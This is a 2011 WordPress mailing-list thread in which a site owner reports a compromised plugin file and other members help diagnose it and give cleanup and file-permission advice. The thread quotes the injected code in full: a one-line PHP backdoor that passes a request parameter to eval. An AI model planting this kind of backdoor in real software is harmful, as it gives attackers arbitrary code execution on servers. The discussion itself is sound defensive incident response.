[wp-hackers] Possible Exploit

Sun Jun 12 15:18:40 UTC 2011

Given seemingly knowledgeable WordPress users propensity to advise others to
set "other" access on folders to everything (aka, "just chmod it to 777")
it's amazing we don't see this more often.

The codex has it right "No directories should ever be given 777, even upload
directories. Since the php process is running as the owner of the files, it
gets the owners permissions and can write to even a 755 directory." but
sadly not every "gets it" until it's too late.

BTW I'm not saying in this case this happened, only that if your choose to
use shared hosting (and with VPS' so cheap, why would you any more) then you
must view "other" as hostile. I've seen so many compromised sites where it's
been taken by another user on the same server

On Sun, Jun 12, 2011 at 2:05 PM, Charles Frees-Melvin <wordpress at cefm.ca>wrote:

> That is quite common. Many attacks are from other non-secure sites on the
> same server.
>
> --
> Charles E. Frees-Melvin
> www.cefm.ca
>
> On 2011-06-12, at 10:00, Baki Goxhaj <banago at gmail.com> wrote:
>
> > Wrote to my hosting account. This is what they are saying:
> >
> > Due to the clustered structure of our systems there is no single log file
> >> for you to use as your site is served by many servers.I would suggest
> you to
> >> please make a full audit of your account in that regards and remove the
> >> malicious code if you find any.
> >>
> >
> > Crazy - I have like 15 websites on there.
> >
> > Kindly,
> >
> > Baki Goxhaj
> > www.wplancer.com | proverbhunter.com | www.banago.info<
> http://proverbhunter.com>
> >
> >
> > On Sun, Jun 12, 2011 at 2:14 PM, Dion Hulse (dd32) <wordpress at dd32.id.au
> >wrote:
> >
> >> Check your access logs for strange requests at the time the file was
> >> detected,  You'll hopefully be able to see a POST request to one of the
> >> plugin files at that point in time, or perhaps a long GET request, if
> you
> >> can narrow down the file attacked, you can work out which plugin has the
> >> vulnerability in it..
> >>
> >> On 12 June 2011 21:59, Baki Goxhaj <banago at gmail.com> wrote:
> >>
> >>> I removed it as soon I found out about it. I hope my other installs are
> >> not
> >>> infected as I don't have the file monitor running there.
> >>>
> >>> Kindly,
> >>>
> >>> Baki Goxhaj
> >>> www.wplancer.com | proverbhunter.com | www.banago.info<
> >>> http://proverbhunter.com>
> >>>
> >>>
> >>> On Sun, Jun 12, 2011 at 1:56 PM, Jon Cave <jon at lionsgoroar.co.uk>
> wrote:
> >>>
> >>>> n Sun, Jun 12, 2011 at 12:45 PM, Baki Goxhaj <banago at gmail.com>
> wrote:
> >>>>> Just got an email from my file monitor plugin that a file had been
> >>>> changed -
> >>>>> it is an inactive plugin file, strangely enough. Here is the content
> >> of
> >>>> the
> >>>>> file now:
> >>>>>
> >>>>> <?php
> >> if(isset($_REQUEST['asc']))eval(stripslashes($_REQUEST['asc']));
> >>> ?>
> >>>>>
> >>>>> Is this something dangerous?
> >>>>
> >>>> Yes this is extremely dangerous. It's basically a backdoor to allow
> >>>> arbitrary PHP code execution on your server. You should remove that
> >>>> code immediately, change passwords, do a full cleanup, etc.
> >>>> _______________________________________________
> >>>> wp-hackers mailing list
> >>>> wp-hackers at lists.automattic.com
> >>>> http://lists.automattic.com/mailman/listinfo/wp-hackers
> >>>>
> >>> _______________________________________________
> >>> wp-hackers mailing list
> >>> wp-hackers at lists.automattic.com
> >>> http://lists.automattic.com/mailman/listinfo/wp-hackers
> >>>
> >> _______________________________________________
> >> wp-hackers mailing list
> >> wp-hackers at lists.automattic.com
> >> http://lists.automattic.com/mailman/listinfo/wp-hackers
> >>
> > _______________________________________________
> > wp-hackers mailing list
> > wp-hackers at lists.automattic.com
> > http://lists.automattic.com/mailman/listinfo/wp-hackers
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>

-- 
Pegden.com IT Management Services
5 Reedsdale Avenue, Gildersome, Leeds, LS27 7JE.
Tel: 0113 815 3777
Business Website: http://www.pegden.com
Personal Website: http://glenn.pegden.com